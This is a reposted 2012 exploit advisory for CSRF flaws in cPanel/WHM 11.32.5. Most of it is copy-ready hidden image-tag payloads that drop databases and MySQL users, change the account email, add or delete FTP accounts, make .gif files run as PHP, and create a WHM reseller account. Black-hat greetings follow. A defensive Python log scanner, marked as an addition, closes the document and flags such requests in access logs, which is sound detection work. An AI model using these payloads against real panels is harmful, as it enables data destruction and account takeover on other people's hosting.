cpanel 11.32.5 (build 11) 11.32.5.11 CSRF

2012.10.21
Credit: AkaStep
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

==========
Vulnerable Software: cPanel version : 11.32.5 (build 11)-11.32.5.11 [ cPanel Pro ]
Vulnerability: CSRF
Vendor: cpanel.net
==========

=====================================================================
Tested version:
Your current cPanel version : 11.32.5 (build 11)-11.32.5.11 [ cPanel Pro ]
Aka: Cpanel Accelerated 2 via WHM 11.32.5 (build 11)

=====================================================================
CSRF: Drop Database: (Method $_GET)

<img src="http://***********.net:2082/frontend/x3/sql/deldb.html?db=armenian_music" height="0" width="0" />

Here we are going to drop database named: armenian_music

=====================================================================
CSRF: Drop mysql user: (Method $_GET)

<img src="http://************.net:2082/frontend/x3/sql/deluser.html?user=armenian_adserve" height="0" width="0" />

Here we are going to drop mysql user named: armenian_adserver ))

=====================================================================
CSRF: Change email address: (Contact Information & Preferences) (Method $_GET)

Changing email address to: owned_and_owned_again@gmail.tld

<img src="http://***********.net:2082/frontend/x3/contact/saveemail.html?email=owned_and_owned_again%40gmail.tld&second_email=&notify_disk_limit=1&notify_bandwidth_limit=1&notify_email_quota_limit=1" height="0" width="0" />

=====================================================================
CSRF adding FTP account:
username: akastep
password: akastep
host is target host.

<img src="http://***********.net:2082/json-api/cpanel?cpanel_jsonapi_version=2&cpanel_jsonapi_module=Ftp&cpanel_jsonapi_func=addftp&user=akastep&pass=akastep&homedir=/&quota=0&cache_fix=owned_by_akastep" height="0" width="0" />

=====================================================================
CSRF Drop FTP account:
Deletes the existing FTP account named: axaxa

<img src="http://************.net:2082/json-api/cpanel?cpanel_jsonapi_version=2&cpanel_jsonapi_module=Ftp&cpanel_jsonapi_func=delftp&user=axaxa&cache_fix=OWNED" height="0" width="0" />

=====================================================================
CSRF change Apache handler: (Parse .gif file as php script)

<img src="http://***********.net:2082/frontend/x3/mime/addhandle.html?handle=application/x-httpd-php&ext=.gif&submit=Add" height="0" width="0" />

=====================================================================
CSRF Delete handler:

<img src="http://***********.net:2082/frontend/x3/mime/delhandle.html?userhandle=.php" height="0" width="0" />

=====================================================================
WHM 11.32.5 (build 11) CSRF:

Add Reseller+setup with
domain: owned.com
username: owned111
password: MYVERYSTRONGGOESHERE
And contact email: owned@owned1.you

<img src="http://***********.net:2086/scripts5/wwwacct?sign=&plan=Reseller+setup&domain=owned.com&username=owned111&password=MYVERYSTRONGGOESHERE&contactemail=owned%40owned1.you&dbuser=owned&msel=n%2Cy%2C1%2Cn%2Cx3%2C1%2C1%2C1%2C1%2C1%2C1000%2Cn%2C0%2C0%2Cdefault%2Cen%2C%2C%2CReseller+setup&pkgname=&featurelist=default&quota=1&bwlimit=1000&maxftp=1&maxpop=1&maxlst=1&maxsql=1&maxsub=1&maxpark=0&maxaddon=0&cgi=1&cpmod=x3&language=en&hasuseregns=1&dkim=1&mxcheck=local" height="0" width="0" />

================================================
SHOUTZ+RESPECTS+GREAT THANKS TO ALL MY FRIENDS:
================================================
packetstormsecurity.org
packetstormsecurity.com
packetstormsecurity.net
securityfocus.com
cxsecurity.com
security.nnov.ru
securtiyvulns.com
securitylab.ru
secunia.com
securityhome.eu
exploitsdownload.com
exploit-db.com
osvdb.com
websecurity.com.ua

to all Aa Team + to all Azerbaijan Black HatZ + *Especially to my bro CAMOUFL4G3 *
Also special thanks to: ottoman38 & HERO_AZE
================================================

/AkaStep
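For defenders reviewing panel logs, the following is an added example (not part of the original advisory and not cPanel code) that flags GET requests to the state-changing endpoints listed above when the Referer is missing or points off the panel. It assumes access logs in combined log format; the host names and log lines are constructed placeholders.

```python
import re
from urllib.parse import parse_qs, urlsplit

# State-changing endpoints named in the advisory above.
SENSITIVE_PATHS = {
    "/frontend/x3/sql/deldb.html", "/frontend/x3/sql/deluser.html",
    "/frontend/x3/contact/saveemail.html", "/frontend/x3/mime/addhandle.html",
    "/frontend/x3/mime/delhandle.html", "/scripts5/wwwacct",
}
SENSITIVE_API_FUNCS = {("Ftp", "addftp"), ("Ftp", "delftp")}

# Assumed layout (combined log format): "METHOD url PROTO" status bytes "referer"
LOG_RE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<url>\S+) [^"]*" \d{3} \S+ "(?P<referer>[^"]*)"'
)

def is_sensitive(url):
    """True if the request targets one of the advisory's endpoints."""
    parts = urlsplit(url)
    if parts.path in SENSITIVE_PATHS:
        return True
    if parts.path == "/json-api/cpanel":
        q = parse_qs(parts.query)
        mod = q.get("cpanel_jsonapi_module", [""])[0]
        func = q.get("cpanel_jsonapi_func", [""])[0]
        return (mod, func) in SENSITIVE_API_FUNCS
    return False

def flag_csrf_candidates(lines, panel_hosts):
    """Return (path, referer) for sensitive GETs whose Referer is missing or off-panel."""
    hits = []
    for line in lines:
        m = LOG_RE.search(line)
        if not m or m["method"] != "GET" or not is_sensitive(m["url"]):
            continue
        ref_host = urlsplit(m["referer"]).hostname  # None for "-" or empty
        if ref_host not in panel_hosts:
            hits.append((urlsplit(m["url"]).path, m["referer"]))
    return hits

# Constructed sample lines; hosts and users are placeholders.
SAMPLE = [
    '192.0.2.10 - alice [21/Oct/2012:10:00:00 +0000] "GET /frontend/x3/sql/deldb.html?db=alice_test HTTP/1.1" 200 512 "http://panel.example:2082/frontend/x3/sql/index.html" "Mozilla/5.0"',
    '192.0.2.10 - alice [21/Oct/2012:10:05:00 +0000] "GET /frontend/x3/sql/deldb.html?db=alice_test HTTP/1.1" 200 512 "http://forum.example/thread/42" "Mozilla/5.0"',
    '192.0.2.10 - alice [21/Oct/2012:10:06:00 +0000] "GET /json-api/cpanel?cpanel_jsonapi_version=2&cpanel_jsonapi_module=Ftp&cpanel_jsonapi_func=addftp&user=demo HTTP/1.1" 200 90 "-" "Mozilla/5.0"',
    '192.0.2.10 - alice [21/Oct/2012:10:07:00 +0000] "GET /frontend/x3/index.html HTTP/1.1" 200 4096 "http://forum.example/thread/42" "Mozilla/5.0"',
]
```

A missing Referer also occurs with bookmarks and strict referrer policies, so hits are triage candidates to correlate with what the account owner actually did, not proof of forgery.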



Copyright 2019, cxsecurity.com

 
